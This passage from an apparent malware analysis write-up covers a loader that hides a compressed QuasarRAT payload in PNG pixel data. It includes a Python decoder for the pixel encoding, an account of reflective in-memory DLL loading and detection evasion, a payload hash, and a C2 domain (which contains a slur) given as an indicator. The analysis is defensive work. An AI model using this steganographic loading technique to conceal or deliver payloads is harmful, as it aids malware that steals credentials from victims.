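    GetPixel() traversal of the PowerShell loader. Pixels (0,0) and (1,0)
    encode the payload length as R0<<24 | G0<<16 | B0<<8 | R1.
    """
    p0, p1 = pixels[0], pixels[1]
    size = (p0[0] << 24) | (p0[1] << 16) | (p0[2] << 8) | p1[0]

    data = bytearray()
    for i, (r, g, b) in enumerate(pixels):
        if i < 2:  # skip the two length-marker pixels
            continue
        data += bytes((r, g, b))

    # truncate the padding, then inflate
    return gzip.decompress(bytes(data[:size]))
```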

3. Reflective loading of the DLL

The DLL is never written to disk. Instead, it is:

  • loaded directly into memory,
  • executed via .NET reflection,
  • invoked through its entry point (with or without parameters).

This technique avoids leaving artifacts on disk and bypasses many detection mechanisms.

4. Execution of the final malware payload

The final payload, typically a stealer or remote-control module, runs fully in memory.

The PNG image

The PNG image looks like this:

(For security reasons, a watermark is embedded in the displayed version. You can download the original PNG here.)

To extract the payload from the image, we can use a small Python script (included in the GitHub repository).
This produces a file called stage2_payload.bin with the SHA256 hash d6775da94945ff5cbd26a1711f69cecdce981386983d2f504914630639563c36.
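To sanity-check your own extraction against the reported hash, the digest can be recomputed locally with a generic helper (the filename is the one produced by the extraction script):

```python
import hashlib

def sha256_of(path, chunk_size=65536):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# sha256_of("stage2_payload.bin") should match the hash reported above
```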

A quick VirusTotal scan provides additional details:

VirusTotal classifies the malware as Zusy (also known as Barys).
Zusy is an older but still active family of Windows malware. It has appeared for many years in small-scale campaigns and is typically used to steal credentials, browser information, or banking data. It is written in native C/C++. To confirm this, I took a closer look at the file in Ghidra.


When analyzing a binary in Ghidra, the presence of functions named .ctor or .cctor is a strong indicator that the file contains .NET managed code. These method names come directly from the Common Language Runtime (CLR) and follow the naming conventions defined by the ECMA-335 Common Language Infrastructure (CLI) specification.

This indicates that we are not dealing with a typical Zusy malware sample, as Zusy does not use .NET managed code in any part of its execution chain.


I also uploaded the file to abuse.ch, where it was classified as “QuasarRAT”. This classification makes sense, as QuasarRAT is a remote access trojan written entirely in .NET.

QuasarRAT is a well-known open-source Windows remote access tool that has been abused by cybercriminals for years. It provides features such as keylogging, credential theft, file management, remote command execution, and real-time system monitoring. Because it is written in .NET, it is frequently modified, repacked, or extended by threat actors, making it easy to customize and embed into multi-stage loaders.

It is also interesting to examine the domains contacted by the malware.

The malware first retrieves the host’s public IP address using ipwho.is, and then contacts its command-and-control (C2) server hosted on the domain:

ihatefaggots.cc

This domain should be treated as an additional IOC.